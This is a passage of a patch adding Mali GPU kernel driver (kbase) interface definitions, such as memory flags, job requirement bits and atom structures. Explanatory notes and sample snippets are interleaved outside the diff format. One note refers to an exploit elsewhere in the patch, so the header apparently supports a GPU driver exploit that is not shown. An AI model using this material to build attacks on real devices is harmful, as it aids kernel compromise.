virtual space. + * Since this flag is primarily required only for the TLS memory which will + * not be used to contain executable code and also not used for Tiler heap, + * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags. + */ +#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6) + +/* Userspace is not allowed to free this memory. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7) + +#define BASE_MEM_RESERVED_BIT_8 ((base_mem_alloc_flags)1 << 8) + +/* Grow backing store on GPU Page Fault + */ +#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9) + +/* Page coherence Outer shareable, if available + */ +#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10) + +/* Page coherence Inner shareable + */ +#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11) + +/* IN/OUT */ +/* Should be cached on the CPU, returned if actually cached + */ +#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12) + +/* IN/OUT */ +/* Must have same VA on both the GPU and the CPU + */ +#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13) + +/* OUT */ +/* Must call mmap to acquire a GPU address for the allocation + */ +#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14) + +/* IN */ +/* Page coherence Outer shareable, required. + */ +#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15) + +/* Protected memory + */ +#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16) + +/* Not needed physical memory + */ +#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17) + +/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the + * addresses to be the same + */ +#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18) + +/** + * Bit 19 is reserved. + * + * Do not remove, use the next unreserved bit for new flags + */ +#define BASE_MEM_RESERVED_BIT_19 ((base_mem_alloc_flags)1 << 19) + +/** + * Memory starting from the end of the initial commit is aligned to 'extension' + * pages, where 'extension' must be a power of 2 and no more than + * BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES + */ +#define BASE_MEM_TILER_ALIGN_TOP ((base_mem_alloc_flags)1 << 20) + +/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu + * mode. Some components within the GPU might only be able to access memory + * that is GPU cacheable. Refer to the specific GPU implementation for more + * details. The 3 shareability flags will be ignored for GPU uncached memory.
+ * If used while importing USER_BUFFER type memory, then the import will fail + * if the memory is not aligned to GPU and CPU cache line width. + */ +#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21) + +/* + * Bits [22:25] for group_id (0~15). + * + * base_mem_group_id_set() should be used to pack a memory group ID into a + * base_mem_alloc_flags value instead of accessing the bits directly. + * base_mem_group_id_get() should be used to extract the memory group ID from + * a base_mem_alloc_flags value. + */ +#define BASEP_MEM_GROUP_ID_SHIFT 22 +#define BASE_MEM_GROUP_ID_MASK \ + ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT) + +/* Must do CPU cache maintenance when imported memory is mapped/unmapped + * on GPU. Currently applicable to dma-buf type only. + */ +#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26) + +/* Use the GPU VA chosen by the kernel client */ +#define BASE_MEM_FLAG_MAP_FIXED ((base_mem_alloc_flags)1 << 27) + +/* OUT */ +/* Kernel side cache sync ops required */ +#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28) + +/* Force trimming of JIT allocations when creating a new allocation */ +#define BASEP_MEM_PERFORM_JIT_TRIM ((base_mem_alloc_flags)1 << 29) + +/* Number of bits used as flags for base memory management + * + * Must be kept in sync with the base_mem_alloc_flags flags + */ +#define BASE_MEM_FLAGS_NR_BITS 30 + +/* A mask of all the flags which are only valid for allocations within kbase, + * and may not be passed from user space. + */ +#define BASEP_MEM_FLAGS_KERNEL_ONLY \ + (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE | \ + BASE_MEM_FLAG_MAP_FIXED | BASEP_MEM_PERFORM_JIT_TRIM) + +/* A mask for all output bits, excluding IN/OUT bits. + */ +#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP + +/* A mask for all input bits, including IN/OUT bits. + */ +#define BASE_MEM_FLAGS_INPUT_MASK \ + (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK) + +/* A mask of all currently reserved flags + */ +#define BASE_MEM_FLAGS_RESERVED \ + (BASE_MEM_RESERVED_BIT_8 | BASE_MEM_RESERVED_BIT_19) + +#define BASEP_MEM_INVALID_HANDLE (0ull << 12) +#define BASE_MEM_MMU_DUMP_HANDLE (1ull << 12) +#define BASE_MEM_TRACE_BUFFER_HANDLE (2ull << 12) +#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12) +#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ull << 12) +/* reserved handles ..-47< for future special handles */ +#define BASE_MEM_COOKIE_BASE (64ul << 12) +#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << 12) + \ + BASE_MEM_COOKIE_BASE) + +/* Similar to BASE_MEM_TILER_ALIGN_TOP, memory starting from the end of the + * initial commit is aligned to 'extension' pages, where 'extension' must be a power + * of 2 and no more than BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES + */ +#define BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP (1 << 0) + +/** + * If set, the heap info address points to a __u32 holding the used size in bytes; + * otherwise it points to a __u64 holding the lowest address of unused memory. + */ +#define BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE (1 << 1) + +/** + * Valid set of just-in-time memory allocation flags + * + * Note: BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE cannot be set if heap_info_gpu_addr + * in %base_jit_alloc_info is 0 (atom with BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE set + * and heap_info_gpu_addr being 0 will be rejected). 
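base_mem_group_id_set() and base_mem_group_id_get(), which the comment above refers to, are not part of this header; illustrative equivalents built purely from the shift/mask definitions above (helper names invented here):

static inline base_mem_alloc_flags group_id_set(base_mem_alloc_flags flags, unsigned int id)
{
    return (flags & ~BASE_MEM_GROUP_ID_MASK) |
           (((base_mem_alloc_flags)id << BASEP_MEM_GROUP_ID_SHIFT) &
            BASE_MEM_GROUP_ID_MASK);
}

static inline unsigned int group_id_get(base_mem_alloc_flags flags)
{
    return (unsigned int)((flags & BASE_MEM_GROUP_ID_MASK) >>
                          BASEP_MEM_GROUP_ID_SHIFT);
}

The exploit's map_gpu() later in this patch takes the direct route instead and simply ORs (group << 22) into the allocation flags.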
+ */ +#define BASE_JIT_ALLOC_VALID_FLAGS \ + (BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP | BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE) + +/** + * typedef base_context_create_flags - Flags to pass to ::base_context_init. + * + * Flags can be ORed together to enable multiple things. + * + * These share the same space as BASEP_CONTEXT_FLAG_*, and so must + * not collide with them. + */ +typedef __u32 base_context_create_flags; + +/* No flags set */ +#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0) + +/* Base context is embedded in a cctx object (flag used for CINSTR + * software counter macros) + */ +#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0) + +/* Base context is a 'System Monitor' context for Hardware counters. + * + * One important side effect of this is that job submission is disabled. + */ +#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED \ + ((base_context_create_flags)1 << 1) + +/* Bit-shift used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3) + +/* Bitmask used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \ + ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT) + +/* Bitpattern describing the base_context_create_flags that can be + * passed to the kernel + */ +#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \ + (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | \ + BASEP_CONTEXT_MMU_GROUP_ID_MASK) + +/* Bitpattern describing the ::base_context_create_flags that can be + * passed to base_context_init() + */ +#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \ + (BASE_CONTEXT_CCTX_EMBEDDED | BASEP_CONTEXT_CREATE_KERNEL_FLAGS) + +/* + * Private flags used on the base context + * + * These start at bit 31, and run down to zero. + * + * They share the same space as base_context_create_flags, and so must + * not collide with them. + */ + +/* Private flag tracking whether job descriptor dumping is disabled */ +#define BASEP_CONTEXT_FLAG_JOB_DUMP_DISABLED \ + ((base_context_create_flags)(1 << 31)) + +/* Enable additional tracepoints for latency measurements (TL_ATOM_READY, + * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST) + */ +#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0) + +/* Indicate that job dumping is enabled. This could affect certain timers + * to account for the performance impact. + */ +#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1) + +#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \ + BASE_TLSTREAM_JOB_DUMPING_ENABLED) +/* + * Dependency stuff, keep it private for now. May want to expose it if + * we decide to make the number of semaphores a configurable + * option. + */ +#define BASE_JD_ATOM_COUNT 256 + +/* Maximum number of concurrent render passes. + */ +#define BASE_JD_RP_COUNT (256) + +/* Set/reset values for a software event */ +#define BASE_JD_SOFT_EVENT_SET ((unsigned char)1) +#define BASE_JD_SOFT_EVENT_RESET ((unsigned char)0) + +/** + * struct base_jd_udata - Per-job data + * + * This structure is used to store per-job data, and is completely unused + * by the Base driver. It can be used to store things such as callback + * function pointer, data to handle job completion. It is guaranteed to be + * untouched by the Base driver. + * + * @blob: per-job data array + */ +struct base_jd_udata { + __u64 blob[2]; +}; + +/** + * typedef base_jd_dep_type - Job dependency type. 
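As a worked example of the encoding above: a context that disables job submission and selects MMU memory group 1 would build its create flags as below, staying within BASEP_CONTEXT_CREATE_KERNEL_FLAGS. The flags are then handed to the driver's set-flags ioctl, which is outside this excerpt; the group argument of the exploit's setup_mali(fd, group) helper plausibly feeds into the same field:

base_context_create_flags cflags =
    BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED |
    (((base_context_create_flags)1 << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT) &
     BASEP_CONTEXT_MMU_GROUP_ID_MASK);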
+ * + * A flags field will be inserted into the atom structure to specify whether a + * dependency is a data or ordering dependency (by putting it before/after + * 'core_req' in the structure it should be possible to add without changing + * the structure size). + * When the flag is set for a particular dependency to signal that it is an + * ordering only dependency then errors will not be propagated. + */ +typedef __u8 base_jd_dep_type; + +#define BASE_JD_DEP_TYPE_INVALID (0) /**< Invalid dependency */ +#define BASE_JD_DEP_TYPE_DATA (1U << 0) /**< Data dependency */ +#define BASE_JD_DEP_TYPE_ORDER (1U << 1) /**< Order dependency */ + +/** + * typedef base_jd_core_req - Job chain hardware requirements. + * + * A job chain must specify what GPU features it needs to allow the + * driver to schedule the job correctly. By not specifying the + * correct settings can/will cause an early job termination. Multiple + * values can be ORed together to specify multiple requirements. + * Special case is ::BASE_JD_REQ_DEP, which is used to express complex + * dependencies, and that doesn't execute anything on the hardware. + */ +typedef __u32 base_jd_core_req; + +/* Requirements that come from the HW */ + +/* No requirement, dependency only + */ +#define BASE_JD_REQ_DEP ((base_jd_core_req)0) + +/* Requires fragment shaders + */ +#define BASE_JD_REQ_FS ((base_jd_core_req)1 << 0) + +/* Requires compute shaders + * + * This covers any of the following GPU job types: + * - Vertex Shader Job + * - Geometry Shader Job + * - An actual Compute Shader Job + * + * Compare this with BASE_JD_REQ_ONLY_COMPUTE, which specifies that the + * job is specifically just the "Compute Shader" job type, and not the "Vertex + * Shader" nor the "Geometry Shader" job type. + */ +#define BASE_JD_REQ_CS ((base_jd_core_req)1 << 1) + +/* Requires tiling */ +#define BASE_JD_REQ_T ((base_jd_core_req)1 << 2) + +/* Requires cache flushes */ +#define BASE_JD_REQ_CF ((base_jd_core_req)1 << 3) + +/* Requires value writeback */ +#define BASE_JD_REQ_V ((base_jd_core_req)1 << 4) + +/* SW-only requirements - the HW does not expose these as part of the job slot + * capabilities + */ + +/* Requires fragment job with AFBC encoding */ +#define BASE_JD_REQ_FS_AFBC ((base_jd_core_req)1 << 13) + +/* SW-only requirement: coalesce completion events. + * If this bit is set then completion of this atom will not cause an event to + * be sent to userspace, whether successful or not; completion events will be + * deferred until an atom completes which does not have this bit set. + * + * This bit may not be used in combination with BASE_JD_REQ_EXTERNAL_RESOURCES. + */ +#define BASE_JD_REQ_EVENT_COALESCE ((base_jd_core_req)1 << 5) + +/* SW Only requirement: the job chain requires a coherent core group. We don't + * mind which coherent core group is used. + */ +#define BASE_JD_REQ_COHERENT_GROUP ((base_jd_core_req)1 << 6) + +/* SW Only requirement: The performance counters should be enabled only when + * they are needed, to reduce power consumption. + */ +#define BASE_JD_REQ_PERMON ((base_jd_core_req)1 << 7) + +/* SW Only requirement: External resources are referenced by this atom. + * + * This bit may not be used in combination with BASE_JD_REQ_EVENT_COALESCE and + * BASE_JD_REQ_SOFT_EVENT_WAIT. + */ +#define BASE_JD_REQ_EXTERNAL_RESOURCES ((base_jd_core_req)1 << 8) + +/* SW Only requirement: Software defined job. 
Jobs with this bit set will not be + * submitted to the hardware but will cause some action to happen within the + * driver + */ +#define BASE_JD_REQ_SOFT_JOB ((base_jd_core_req)1 << 9) + +#define BASE_JD_REQ_SOFT_DUMP_CPU_GPU_TIME (BASE_JD_REQ_SOFT_JOB | 0x1) +#define BASE_JD_REQ_SOFT_FENCE_TRIGGER (BASE_JD_REQ_SOFT_JOB | 0x2) +#define BASE_JD_REQ_SOFT_FENCE_WAIT (BASE_JD_REQ_SOFT_JOB | 0x3) + +/* 0x4 RESERVED for now */ + +/* SW only requirement: event wait/trigger job. + * + * - BASE_JD_REQ_SOFT_EVENT_WAIT: this job will block until the event is set. + * - BASE_JD_REQ_SOFT_EVENT_SET: this job sets the event, thus unblocks the + * other waiting jobs. It completes immediately. + * - BASE_JD_REQ_SOFT_EVENT_RESET: this job resets the event, making it + * possible for other jobs to wait upon. It completes immediately. + */ +#define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB | 0x5) +#define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB | 0x6) +#define BASE_JD_REQ_SOFT_EVENT_RESET (BASE_JD_REQ_SOFT_JOB | 0x7) + +#define BASE_JD_REQ_SOFT_DEBUG_COPY (BASE_JD_REQ_SOFT_JOB | 0x8) + +/* SW only requirement: Just In Time allocation + * + * This job requests a single or multiple just-in-time allocations through a + * list of base_jit_alloc_info structure which is passed via the jc element of + * the atom. The number of base_jit_alloc_info structures present in the + * list is passed via the nr_extres element of the atom + * + * It should be noted that the id entry in base_jit_alloc_info must not + * be reused until it has been released via BASE_JD_REQ_SOFT_JIT_FREE. + * + * Should this soft job fail it is expected that a BASE_JD_REQ_SOFT_JIT_FREE + * soft job to free the JIT allocation is still made. + * + * The job will complete immediately. + */ +#define BASE_JD_REQ_SOFT_JIT_ALLOC (BASE_JD_REQ_SOFT_JOB | 0x9) + +/* SW only requirement: Just In Time free + * + * This job requests a single or multiple just-in-time allocations created by + * BASE_JD_REQ_SOFT_JIT_ALLOC to be freed. The ID list of the just-in-time + * allocations is passed via the jc element of the atom. + * + * The job will complete immediately. + */ +#define BASE_JD_REQ_SOFT_JIT_FREE (BASE_JD_REQ_SOFT_JOB | 0xa) + +/* SW only requirement: Map external resource + * + * This job requests external resource(s) are mapped once the dependencies + * of the job have been satisfied. The list of external resources are + * passed via the jc element of the atom which is a pointer to a + * base_external_resource_list. + */ +#define BASE_JD_REQ_SOFT_EXT_RES_MAP (BASE_JD_REQ_SOFT_JOB | 0xb) + +/* SW only requirement: Unmap external resource + * + * This job requests external resource(s) are unmapped once the dependencies + * of the job has been satisfied. The list of external resources are + * passed via the jc element of the atom which is a pointer to a + * base_external_resource_list. + */ +#define BASE_JD_REQ_SOFT_EXT_RES_UNMAP (BASE_JD_REQ_SOFT_JOB | 0xc) + +/* HW Requirement: Requires Compute shaders (but not Vertex or Geometry Shaders) + * + * This indicates that the Job Chain contains GPU jobs of the 'Compute + * Shaders' type. + * + * In contrast to BASE_JD_REQ_CS, this does not indicate that the Job + * Chain contains 'Geometry Shader' or 'Vertex Shader' jobs. 
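Putting the JIT comment above into code: a hedged sketch of a single just-in-time allocation request. base_jit_alloc_info and base_jd_atom_v2 are declared further down in this header, result_va is a hypothetical GPU address for the driver to write the allocated GPU VA back to, and the actual submission through the job-submit ioctl is omitted:

struct base_jit_alloc_info jit = {0};
jit.va_pages = 16;
jit.commit_pages = 16;
jit.id = 1;                        /* must not be reused until SOFT_JIT_FREE */
jit.gpu_alloc_addr = result_va;

struct base_jd_atom_v2 atom = {0};
atom.jc = (__u64)(uintptr_t)&jit;  /* list of base_jit_alloc_info */
atom.nr_extres = 1;                /* number of entries in that list */
atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC;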
+ */ +#define BASE_JD_REQ_ONLY_COMPUTE ((base_jd_core_req)1 << 10) + +/* HW Requirement: Use the base_jd_atom::device_nr field to specify a + * particular core group + * + * If both BASE_JD_REQ_COHERENT_GROUP and this flag are set, this flag + * takes priority + * + * This is only guaranteed to work for BASE_JD_REQ_ONLY_COMPUTE atoms. + * + * If the core availability policy is keeping the required core group turned + * off, then the job will fail with a BASE_JD_EVENT_PM_EVENT error code. + */ +#define BASE_JD_REQ_SPECIFIC_COHERENT_GROUP ((base_jd_core_req)1 << 11) + +/* SW Flag: If this bit is set then the successful completion of this atom + * will not cause an event to be sent to userspace + */ +#define BASE_JD_REQ_EVENT_ONLY_ON_FAILURE ((base_jd_core_req)1 << 12) + +/* SW Flag: If this bit is set then completion of this atom will not cause an + * event to be sent to userspace, whether successful or not. + */ +#define BASEP_JD_REQ_EVENT_NEVER ((base_jd_core_req)1 << 14) + +/* SW Flag: Skip GPU cache clean and invalidation before starting a GPU job. + * + * If this bit is set then the GPU's cache will not be cleaned and invalidated + * until a GPU job starts which does not have this bit set or a job completes + * which does not have the BASE_JD_REQ_SKIP_CACHE_END bit set. Do not use + * if the CPU may have written to memory addressed by the job since the last job + * without this bit set was submitted. + */ +#define BASE_JD_REQ_SKIP_CACHE_START ((base_jd_core_req)1 << 15) + +/* SW Flag: Skip GPU cache clean and invalidation after a GPU job completes. + * + * If this bit is set then the GPU's cache will not be cleaned and invalidated + * until a GPU job completes which does not have this bit set or a job starts + * which does not have the BASE_JD_REQ_SKIP_CACHE_START bit set. Do not use + * if the CPU may read from or partially overwrite memory addressed by the job + * before the next job without this bit set completes. + */ +#define BASE_JD_REQ_SKIP_CACHE_END ((base_jd_core_req)1 << 16) + +/* Request the atom be executed on a specific job slot. + * + * When this flag is specified, it takes precedence over any existing job slot + * selection logic. + */ +#define BASE_JD_REQ_JOB_SLOT ((base_jd_core_req)1 << 17) + +/* SW-only requirement: The atom is the start of a renderpass. + * + * If this bit is set then the job chain will be soft-stopped if it causes the + * GPU to write beyond the end of the physical pages backing the tiler heap, and + * committing more memory to the heap would exceed an internal threshold. It may + * be resumed after running one of the job chains attached to an atom with + * BASE_JD_REQ_END_RENDERPASS set and the same renderpass ID. It may be + * resumed multiple times until it completes without memory usage exceeding the + * threshold. + * + * Usually used with BASE_JD_REQ_T. + */ +#define BASE_JD_REQ_START_RENDERPASS ((base_jd_core_req)1 << 18) + +/* SW-only requirement: The atom is the end of a renderpass. + * + * If this bit is set then the atom incorporates the CPU address of a + * base_jd_fragment object instead of the GPU address of a job chain. + * + * Which job chain is run depends upon whether the atom with the same renderpass + * ID and the BASE_JD_REQ_START_RENDERPASS bit set completed normally or + * was soft-stopped when it exceeded an upper threshold for tiler heap memory + * usage. 
+ * + * It also depends upon whether one of the job chains attached to the atom has + * already been run as part of the same renderpass (in which case it would have + * written unresolved multisampled and otherwise-discarded output to temporary + * buffers that need to be read back). The job chain for doing a forced read and + * forced write (from/to temporary buffers) is run as many times as necessary. + * + * Usually used with BASE_JD_REQ_FS. + */ +#define BASE_JD_REQ_END_RENDERPASS ((base_jd_core_req)1 << 19) + +/* SW-only requirement: The atom needs to run on a limited core mask affinity. + * + * If this bit is set then the kbase_context.limited_core_mask will be applied + * to the affinity. + */ +#define BASE_JD_REQ_LIMITED_CORE_MASK ((base_jd_core_req)1 << 20) + +/* These requirement bits are currently unused in base_jd_core_req + */ +#define BASEP_JD_REQ_RESERVED \ + (~(BASE_JD_REQ_ATOM_TYPE | BASE_JD_REQ_EXTERNAL_RESOURCES | \ + BASE_JD_REQ_EVENT_ONLY_ON_FAILURE | BASEP_JD_REQ_EVENT_NEVER | \ + BASE_JD_REQ_EVENT_COALESCE | \ + BASE_JD_REQ_COHERENT_GROUP | BASE_JD_REQ_SPECIFIC_COHERENT_GROUP | \ + BASE_JD_REQ_FS_AFBC | BASE_JD_REQ_PERMON | \ + BASE_JD_REQ_SKIP_CACHE_START | BASE_JD_REQ_SKIP_CACHE_END | \ + BASE_JD_REQ_JOB_SLOT | BASE_JD_REQ_START_RENDERPASS | \ + BASE_JD_REQ_END_RENDERPASS | BASE_JD_REQ_LIMITED_CORE_MASK)) + +/* Mask of all bits in base_jd_core_req that control the type of the atom. + * + * This allows dependency only atoms to have flags set + */ +#define BASE_JD_REQ_ATOM_TYPE \ + (BASE_JD_REQ_FS | BASE_JD_REQ_CS | BASE_JD_REQ_T | BASE_JD_REQ_CF | \ + BASE_JD_REQ_V | BASE_JD_REQ_SOFT_JOB | BASE_JD_REQ_ONLY_COMPUTE) + +/** + * Mask of all bits in base_jd_core_req that control the type of a soft job. + */ +#define BASE_JD_REQ_SOFT_JOB_TYPE (BASE_JD_REQ_SOFT_JOB | 0x1f) + +/* Returns non-zero value if core requirements passed define a soft job or + * a dependency only job. + */ +#define BASE_JD_REQ_SOFT_JOB_OR_DEP(core_req) \ + (((core_req) & BASE_JD_REQ_SOFT_JOB) || \ + ((core_req) & BASE_JD_REQ_ATOM_TYPE) == BASE_JD_REQ_DEP) + +/** + * enum kbase_jd_atom_state + * + * @KBASE_JD_ATOM_STATE_UNUSED: Atom is not used. + * @KBASE_JD_ATOM_STATE_QUEUED: Atom is queued in JD. + * @KBASE_JD_ATOM_STATE_IN_JS: Atom has been given to JS (is runnable/running). + * @KBASE_JD_ATOM_STATE_HW_COMPLETED: Atom has been completed, but not yet + * handed back to job dispatcher for + * dependency resolution. + * @KBASE_JD_ATOM_STATE_COMPLETED: Atom has been completed, but not yet handed + * back to userspace. + */ +enum kbase_jd_atom_state { + KBASE_JD_ATOM_STATE_UNUSED, + KBASE_JD_ATOM_STATE_QUEUED, + KBASE_JD_ATOM_STATE_IN_JS, + KBASE_JD_ATOM_STATE_HW_COMPLETED, + KBASE_JD_ATOM_STATE_COMPLETED +}; + +/** + * typedef base_atom_id - Type big enough to store an atom number in. + */ +typedef __u8 base_atom_id; + +/** + * struct base_dependency - + * + * @atom_id: An atom number + * @dependency_type: Dependency type + */ +struct base_dependency { + base_atom_id atom_id; + base_jd_dep_type dependency_type; +}; + +/** + * struct base_jd_fragment - Set of GPU fragment job chains used for rendering. + * + * @norm_read_norm_write: Job chain for full rendering. + * GPU address of a fragment job chain to render in the + * circumstance where the tiler job chain did not exceed + * its memory usage threshold and no fragment job chain + * was previously run for the same renderpass. + * It is used no more than once per renderpass. 
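A small illustration of how the BASE_JD_REQ_* masks above compose (helpers invented here, not taken from the driver):

static inline int is_dep_only(base_jd_core_req req)
{
    return (req & BASE_JD_REQ_ATOM_TYPE) == BASE_JD_REQ_DEP;
}

static inline base_jd_core_req soft_job_type(base_jd_core_req req)
{
    /* e.g. BASE_JD_REQ_SOFT_EVENT_SET; only meaningful when the
     * BASE_JD_REQ_SOFT_JOB bit is set in req */
    return req & BASE_JD_REQ_SOFT_JOB_TYPE;
}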
+ * @norm_read_forced_write: Job chain for starting incremental + * rendering. + * GPU address of a fragment job chain to render in + * the circumstance where the tiler job chain exceeded + * its memory usage threshold for the first time and + * no fragment job chain was previously run for the + * same renderpass. + * Writes unresolved multisampled and normally- + * discarded output to temporary buffers that must be + * read back by a subsequent forced_read job chain + * before the renderpass is complete. + * It is used no more than once per renderpass. + * @forced_read_forced_write: Job chain for continuing incremental + * rendering. + * GPU address of a fragment job chain to render in + * the circumstance where the tiler job chain + * exceeded its memory usage threshold again + * and a fragment job chain was previously run for + * the same renderpass. + * Reads unresolved multisampled and + * normally-discarded output from temporary buffers + * written by a previous forced_write job chain and + * writes the same to temporary buffers again. + * It is used as many times as required until + * rendering completes. + * @forced_read_norm_write: Job chain for ending incremental rendering. + * GPU address of a fragment job chain to render in the + * circumstance where the tiler job chain did not + * exceed its memory usage threshold this time and a + * fragment job chain was previously run for the same + * renderpass. + * Reads unresolved multisampled and normally-discarded + * output from temporary buffers written by a previous + * forced_write job chain in order to complete a + * renderpass. + * It is used no more than once per renderpass. + * + * This structure is referenced by the main atom structure if + * BASE_JD_REQ_END_RENDERPASS is set in the base_jd_core_req. + */ +struct base_jd_fragment { + __u64 norm_read_norm_write; + __u64 norm_read_forced_write; + __u64 forced_read_forced_write; + __u64 forced_read_norm_write; +}; + +/** + * typedef base_jd_prio - Base Atom priority. + * + * Only certain priority levels are actually implemented, as specified by the + * BASE_JD_PRIO_<...> definitions below. It is undefined to use a priority + * level that is not one of those defined below. + * + * Priority levels only affect scheduling after the atoms have had dependencies + * resolved. For example, a low priority atom that has had its dependencies + * resolved might run before a higher priority atom that has not had its + * dependencies resolved. + * + * In general, fragment atoms do not affect non-fragment atoms with + * lower priorities, and vice versa. One exception is that there is only one + * priority value for each context. So a high-priority (e.g.) fragment atom + * could increase its context priority, causing its non-fragment atoms to also + * be scheduled sooner. + * + * The atoms are scheduled as follows with respect to their priorities: + * * Let atoms 'X' and 'Y' be for the same job slot who have dependencies + * resolved, and atom 'X' has a higher priority than atom 'Y' + * * If atom 'Y' is currently running on the HW, then it is interrupted to + * allow atom 'X' to run soon after + * * If instead neither atom 'Y' nor atom 'X' are running, then when choosing + * the next atom to run, atom 'X' will always be chosen instead of atom 'Y' + * * Any two atoms that have the same priority could run in any order with + * respect to each other. That is, there is no ordering constraint between + * atoms of the same priority. 
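The four-way choice documented above, restated as code purely for illustration (the real selection lives in the kernel's renderpass handling):

static __u64 pick_fragment_jc(const struct base_jd_fragment *f,
                              int tiler_exceeded_threshold,
                              int fragment_ran_before)
{
    if (!tiler_exceeded_threshold && !fragment_ran_before)
        return f->norm_read_norm_write;     /* full rendering */
    if (tiler_exceeded_threshold && !fragment_ran_before)
        return f->norm_read_forced_write;   /* start incremental rendering */
    if (tiler_exceeded_threshold && fragment_ran_before)
        return f->forced_read_forced_write; /* continue incremental rendering */
    return f->forced_read_norm_write;       /* end incremental rendering */
}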
+ * + * The sysfs file 'js_ctx_scheduling_mode' is used to control how atoms are + * scheduled between contexts. The default value, 0, will cause higher-priority + * atoms to be scheduled first, regardless of their context. The value 1 will + * use a round-robin algorithm when deciding which context's atoms to schedule + * next, so higher-priority atoms can only preempt lower priority atoms within + * the same context. See KBASE_JS_SYSTEM_PRIORITY_MODE and + * KBASE_JS_PROCESS_LOCAL_PRIORITY_MODE for more details. + */ +typedef __u8 base_jd_prio; + +/* Medium atom priority. This is a priority higher than BASE_JD_PRIO_LOW */ +#define BASE_JD_PRIO_MEDIUM ((base_jd_prio)0) +/* High atom priority. This is a priority higher than BASE_JD_PRIO_MEDIUM and + * BASE_JD_PRIO_LOW + */ +#define BASE_JD_PRIO_HIGH ((base_jd_prio)1) +/* Low atom priority. */ +#define BASE_JD_PRIO_LOW ((base_jd_prio)2) +/* Real-Time atom priority. This is a priority higher than BASE_JD_PRIO_HIGH, + * BASE_JD_PRIO_MEDIUM, and BASE_JD_PRIO_LOW + */ +#define BASE_JD_PRIO_REALTIME ((base_jd_prio)3) + +/* Count of the number of priority levels. This itself is not a valid + * base_jd_prio setting + */ +#define BASE_JD_NR_PRIO_LEVELS 4 + +/** + * struct base_jd_atom_v2 - Node of a dependency graph used to submit a + * GPU job chain or soft-job to the kernel driver. + * + * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS + * is set in the base_jd_core_req) the CPU address of a + * base_jd_fragment object. + * @udata: User data. + * @extres_list: List of external resources. + * @nr_extres: Number of external resources or JIT allocations. + * @jit_id: Zero-terminated array of IDs of just-in-time memory + * allocations written to by the atom. When the atom + * completes, the value stored at the + * &struct_base_jit_alloc_info.heap_info_gpu_addr of + * each allocation is read in order to enforce an + * overall physical memory usage limit. + * @pre_dep: Pre-dependencies. One need to use SETTER function to assign + * this field; this is done in order to reduce possibility of + * improper assignment of a dependency field. + * @atom_number: Unique number to identify the atom. + * @prio: Atom priority. Refer to base_jd_prio for more details. + * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP + * specified. + * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified. + * @core_req: Core requirements. + * @renderpass_id: Renderpass identifier used to associate an atom that has + * BASE_JD_REQ_START_RENDERPASS set in its core requirements + * with an atom that has BASE_JD_REQ_END_RENDERPASS set. + * @padding: Unused. Must be zero. + * + * This structure has changed since UK 10.2 for which base_jd_core_req was a + * __u16 value. + * + * In UK 